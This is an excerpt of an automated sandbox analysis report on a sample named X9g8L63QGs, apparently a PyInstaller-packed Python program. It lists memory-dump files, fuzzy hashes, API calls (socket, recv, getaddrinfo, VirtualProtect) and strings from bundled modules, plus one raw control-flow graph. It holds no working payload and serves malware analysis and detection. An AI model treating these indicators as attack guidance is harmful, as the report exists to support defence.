• Instruction Fuzzy Hash: 6EF1A3E2A08B8286EB65CF71D808BBA67A0FF85B88F085175DA4D07795EF7CE441C744
APIs
Memory Dump Source
• Source File: 00000007.00000002.1716221369.00007FFB1D5BA000.00000080.00000001.01000000.0000000E.sdmp, Offset: 00007FFB1D5B0000, based on PE: true
• Associated: 00000007.00000002.1716097392.00007FFB1D5B0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.1716138569.00007FFB1D5B1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.1716138569.00007FFB1D5B9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.1716259793.00007FFB1D5BC000.00000004.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1d5b0000_X9g8L63QGs.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: 03bd9974f03543807e197ac8506c8372aa4342259d45412b06815e8c386905c0
• Instruction ID: 0c27aa662ec51a5d2ce29c2d66aab9994a848d7f9606260bddf5b8dbdb39a4ed
• Opcode Fuzzy Hash: 03bd9974f03543807e197ac8506c8372aa4342259d45412b06815e8c386905c0
• Instruction Fuzzy Hash: C56208A262899686E7258E38D40027D7793F758796F045632EE9EC37C4FBBCEA45C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5f32f1e84b7078f76f7840b18c75b772ddf89c4de9b021938304edd184948a2e
                                                                                                                                                                                                                                                                    • Instruction ID: 1bd1c6f0744efd4e2fe839ba255ac97524acc60d063566a7b713f9157565b787
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f32f1e84b7078f76f7840b18c75b772ddf89c4de9b021938304edd184948a2e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF6248A263899286E715CE38D40067D7AD2F749395F04A631EA9ED37D4EE3CEB45CB00
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3fe996ff006b87ba952ac9fe16592842247d2d41a43afbb459ca9963917c1da5
                                                                                                                                                                                                                                                                    • Instruction ID: 4a4c637d6c13e987661f083a21a200753a8ec0cf380d91ef76c240812c949a33
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fe996ff006b87ba952ac9fe16592842247d2d41a43afbb459ca9963917c1da5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F6238A66289D6C6E7258E38E40037E7A95F748795F045532EB9EC37C4EA3CFA45C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1716016692.00007FFB1D34A000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FFB1D340000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715892888.00007FFB1D340000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715936942.00007FFB1D341000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715936942.00007FFB1D349000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716057701.00007FFB1D34C000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1d340000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9d9fa7327b7d8effa6813891e932a12ccc8efe93bba8629d62c1f2e876fbcae7
                                                                                                                                                                                                                                                                    • Instruction ID: 8d4bc04ac43e49afffaff1d38e9e2faaa8337092c407aedff942dc01a75df920
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d9fa7327b7d8effa6813891e932a12ccc8efe93bba8629d62c1f2e876fbcae7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA6207B262899286E7198E38E40027DB791FB5C7A5F045535EA9EC37C4FB7CEA45CB00
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: bind
                                                                                                                                                                                                                                                                    • String ID: bind$socket.bind
                                                                                                                                                                                                                                                                    • API String ID: 1187836755-187351271
                                                                                                                                                                                                                                                                    • Opcode ID: c772f091d13961e78706c3e49babb2eae7ea45e540c7b9e2188f6b33e05915ab
                                                                                                                                                                                                                                                                    • Instruction ID: 8f09234c62dbd8b8f712c67e53bbd2d55d1a314db642e7f05545ca080a886515
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c772f091d13961e78706c3e49babb2eae7ea45e540c7b9e2188f6b33e05915ab
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F1145A1A28F8282E6349B35F4543BA7365FF45BA4F089232DA8D43B65DF3CE505C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: :memory:
• API String ID: 3122504284-2920599690
• Opcode ID: f17bc2a7fbc240265f12274023a72bab645a00ad97817d0cd97924ee0e2d3e31
• Instruction ID: bc26c8c77fc54a04fdd807b81b57745c9679117e25dc5f430b977a19927830f0
• Opcode Fuzzy Hash: f17bc2a7fbc240265f12274023a72bab645a00ad97817d0cd97924ee0e2d3e31
• Instruction Fuzzy Hash: 75428EE2B0D78282EA659B35D558B3A67A1FF85B84F094135EE4D437A1EF3CE494C308
APIs
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: 26e874244b118fc7e52b1032bab19fe5f4e87fb5eca4fdb226c006e1b1e6809b
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: 51F0A932619741C6F7609F60B448776A361AB44334F480235D9ED12BD4DF7CD058C724
APIs
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
• Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
• Instruction ID: 8a33e33300e820ae1148f2f14ed63dc882683611b7847a1049d194ef640dda21
• Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
• Instruction Fuzzy Hash: 74A1E6F0E0EB0681FE548B65E85CB7822A9BF49B50F540535D92E4A7A0EF7CE499C34C
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
• Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: a704ae423db7ff80c5d8b78b9383ad9a6b728f341f5aa79d46b21ad35153d223
• Instruction ID: 072ef628a76b3d1979256f95c5cca2aee3ec1178de16476e2053f4f4ee9725b8
• Opcode Fuzzy Hash: a704ae423db7ff80c5d8b78b9383ad9a6b728f341f5aa79d46b21ad35153d223
• Instruction Fuzzy Hash: 18E04FF2E20B55C2D7185B66E0412687361F719FB4F24A721DA381B3E0DE38D4E1C740
Control-flow Graph (graph rendering omitted; basic blocks in the range 7ffb1b6f3d10-7ffb1b6f8d5d, with calls to GetLastError and SetLastError)
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
• Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007$A3440$D8942
• String ID: No ffi_type for result$ctypes.set_exception$exception: access violation reading %p$exception: access violation writing %p$exception: breakpoint encountered$exception: datatype misalignment$exception: single step$ffi_prep_cif failed
• API String ID: 367293148-3190153140
• Opcode ID: f65b9f3562c72c42a8a5ca1a0fbf884f3c07981d15f91600d342f1b0e3016292
• Instruction ID: 54df4b4080e5c8fe180076b41bd8f4e5c441a10b94430b20a166d4da479a0aee
• Opcode Fuzzy Hash: f65b9f3562c72c42a8a5ca1a0fbf884f3c07981d15f91600d342f1b0e3016292
• Instruction Fuzzy Hash: 148131F1A0DE42C1EB548F21EC94279A762BF55BA4F54E07AE94E436B4CF3CE8488700
Control-flow Graph (graph rendering omitted; basic blocks in the range 7ffb0c1a5b40-7ffb0c1a5f4b)
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007
• String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$You can only execute one statement at a time.$delete$insert$query string is too large$replace$sqlite3.Connection$the query contains a null character$update
• API String ID: 3568877910-3639599724
• Opcode ID: b9bba2aaab375b320d546afff25e4fe72f3c337283b4a5003dc1a0bb2f7215b2
• Instruction ID: 0fadb10f7b582f9ad67b59cb6130a2b85721bccd39f8ac8c7680f55cb21dccd8
• Opcode Fuzzy Hash: b9bba2aaab375b320d546afff25e4fe72f3c337283b4a5003dc1a0bb2f7215b2
• Instruction Fuzzy Hash: FF91A1E1A0CA4396FB609F76E84CA792362FF45B95F0440B6D94E47AA4DF3CE54AC700
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007$C058$F805
• String ID: BEGIN $Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Error while building row_cast_map$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$e$executemany() can only execute DML statements.
• API String ID: 3171314635-3920904728
• Opcode ID: 0176b2ba6c81c25440ba17478a17d083e2d327909e94508213edd427639fa4a3
• Instruction ID: 9fcb9b04bf8e52c8cf47b1c8f02f462aba9297f5652d53a32e34452dba78e4d3
• Opcode Fuzzy Hash: 0176b2ba6c81c25440ba17478a17d083e2d327909e94508213edd427639fa4a3
• Instruction Fuzzy Hash: B94254F6A09A4286EB648F75E45CA3833A0FF85B95F1450B1CA4E477A4DF7DE886C700

Control-flow Graph

• Executed
• Not Executed
APIs
  • Part of subcall function 00007FF7C2667F80: _fread_nolock.LIBCMT ref: 00007FF7C266802A
• _fread_nolock.LIBCMT ref: 00007FF7C2661A1B
  • Part of subcall function 00007FF7C2662910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C2661B6A), ref: 00007FF7C266295E
Strings
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: abc02df14881b8553accab44fb79ef53eaa7c88a432e732f5ead529d710b0ae2
• Instruction ID: 52920b5d223a19b39f35807706df03c52955b73872152158b9657cff46872b77
• Opcode Fuzzy Hash: abc02df14881b8553accab44fb79ef53eaa7c88a432e732f5ead529d710b0ae2
• Instruction Fuzzy Hash: EF818071A08A82C5E720BF28D0442B9A3B2EB847A4F844431D9CDA7F85DEBCE545C774

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
• Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
Similarity
• API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockopt
• String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
• API String ID: 141981615-2881308447
• Opcode ID: f73766ff8fedae8d8420963e7f73361c1de4a50eb99ef0dba8f0394bee6a9da3
• Instruction ID: 9930c6d19dc6c3c9b220c5ec0f76afcdd422a0cca2dafbc646b6a160690ea1d5
• Opcode Fuzzy Hash: f73766ff8fedae8d8420963e7f73361c1de4a50eb99ef0dba8f0394bee6a9da3
• Instruction Fuzzy Hash: DDB1A6A2E18E8582E6148F35D4042B97361FB95BB4F18A335DE9D13AB1EF3CE595C700

Control-flow Graph

control_flow_graph 1666 7ffb1ba4718c-7ffb1ba47230 call 7ffb1ba494a8 1669 7ffb1ba4754e 1666->1669 1670 7ffb1ba47236-7ffb1ba47241 1666->1670 1673 7ffb1ba47550-7ffb1ba47570 1669->1673 1671 7ffb1ba47243-7ffb1ba47246 1670->1671 1672 7ffb1ba47248-7ffb1ba47256 1670->1672 1674 7ffb1ba47291-7ffb1ba472a0 1671->1674 1675 7ffb1ba4727a-7ffb1ba4727e 1672->1675 1676 7ffb1ba47258-7ffb1ba4726e call 7ffb1ba495b0 1672->1676 1679 7ffb1ba472bc-7ffb1ba472c6 1674->1679 1680 7ffb1ba472a2-7ffb1ba472b1 call 7ffb1ba493f8 1674->1680 1677 7ffb1ba47284-7ffb1ba4728a call 7ffb1ba49568 1675->1677 1678 7ffb1ba47537-7ffb1ba47548 call 7ffb1ba494d8 1675->1678 1676->1669 1693 7ffb1ba47274-7ffb1ba47278 1676->1693 1694 7ffb1ba4728d 1677->1694 1678->1669 1685 7ffb1ba472c8 1679->1685 1686 7ffb1ba472e7-7ffb1ba472eb 1679->1686 1698 7ffb1ba474f4-7ffb1ba474f7 1680->1698 1699 7ffb1ba472b7-7ffb1ba472ba 1680->1699 1692 7ffb1ba472cb-7ffb1ba472d7 call 7ffb1ba49328 1685->1692 1688 7ffb1ba472ed-7ffb1ba472f1 1686->1688 1689 7ffb1ba472f3-7ffb1ba472fa 1686->1689 1695 7ffb1ba47303-7ffb1ba47331 call 7ffb1ba49340 1688->1695 1696 7ffb1ba474dd-7ffb1ba474ee call 7ffb1ba494d8 1689->1696 1697 7ffb1ba47300 1689->1697 1692->1698 1710 7ffb1ba472dd-7ffb1ba472e5 1692->1710 1693->1694 1694->1674 1695->1669 1713 7ffb1ba47337-7ffb1ba47382 call 7ffb1ba49548 getaddrinfo call 7ffb1ba49468 1695->1713 1696->1698 1697->1695 1703 7ffb1ba4750d-7ffb1ba47510 1698->1703 1704 7ffb1ba474f9-7ffb1ba474fc 1698->1704 1699->1692 1706 7ffb1ba47512-7ffb1ba47515 1703->1706 1707 7ffb1ba47526-7ffb1ba4752d 1703->1707 1704->1703 1709 7ffb1ba474fe-7ffb1ba47502 1704->1709 1706->1707 1712 7ffb1ba47517-7ffb1ba4751b 1706->1712 1707->1669 1714 7ffb1ba4752f-7ffb1ba47535 FreeAddrInfoW 1707->1714 1709->1703 1711 7ffb1ba47504-7ffb1ba47507 call 7ffb1ba492e8 1709->1711 1710->1695 1711->1703 1712->1707 1716 7ffb1ba4751d-7ffb1ba47520 call 7ffb1ba492e8 1712->1716 1721 7ffb1ba47388-7ffb1ba4738b 1713->1721 1714->1669 1716->1707 1722 7ffb1ba4738d-7ffb1ba4739d call 7ffb1ba44abc 1721->1722 1723 7ffb1ba473a2-7ffb1ba473b0 call 7ffb1ba49348 1721->1723 1722->1698 1723->1698 1728 7ffb1ba473b6-7ffb1ba473bd 1723->1728 1729 7ffb1ba473c3-7ffb1ba473da call 7ffb1ba44864 1728->1729 1730 7ffb1ba4746a-7ffb1ba4746d 1728->1730 1740 7ffb1ba473e0-7ffb1ba4741d call 7ffb1ba49580 1729->1740 1741 7ffb1ba474c6-7ffb1ba474ca 1729->1741 1732 7ffb1ba4746f-7ffb1ba47472 1730->1732 1733 7ffb1ba47483-7ffb1ba47486 1730->1733 1732->1733 1735 7ffb1ba47474-7ffb1ba47478 1732->1735 1736 7ffb1ba4749c-7ffb1ba474a3 1733->1736 1737 7ffb1ba47488-7ffb1ba4748b 1733->1737 1735->1733 1742 7ffb1ba4747a-7ffb1ba4747d call 7ffb1ba492e8 1735->1742 1738 7ffb1ba474ab-7ffb1ba474ae 1736->1738 1739 7ffb1ba474a5 FreeAddrInfoW 1736->1739 1737->1736 1743 7ffb1ba4748d-7ffb1ba47491 1737->1743 1738->1673 1739->1738 1751 7ffb1ba4742f-7ffb1ba47432 1740->1751 1752 7ffb1ba4741f-7ffb1ba47424 1740->1752 1741->1698 1745 7ffb1ba474cc-7ffb1ba474d0 1741->1745 1742->1733 1743->1736 1747 7ffb1ba47493-7ffb1ba47496 call 7ffb1ba492e8 1743->1747 1745->1698 1749 7ffb1ba474d2-7ffb1ba474db call 7ffb1ba492e8 1745->1749 1747->1736 1749->1698 1751->1741 1756 7ffb1ba47438-7ffb1ba47448 call 7ffb1ba49368 1751->1756 1752->1751 1754 7ffb1ba47426-7ffb1ba47429 call 7ffb1ba492e8 1752->1754 1754->1751 1760 7ffb1ba474b3-7ffb1ba474b5 1756->1760 1761 7ffb1ba4744a-7ffb1ba4744c 1756->1761 1760->1741 1764 7ffb1ba474b7-7ffb1ba474bb 1760->1764 1762 7ffb1ba4744e-7ffb1ba47452 1761->1762 1763 7ffb1ba4745d-7ffb1ba47464 1761->1763 1762->1763 1765 7ffb1ba47454-7ffb1ba47457 call 7ffb1ba492e8 1762->1765 1763->1729 1763->1730 1764->1741 1766 7ffb1ba474bd-7ffb1ba474c0 call 7ffb1ba492e8 1764->1766 1765->1763 1766->1741
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
• Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp
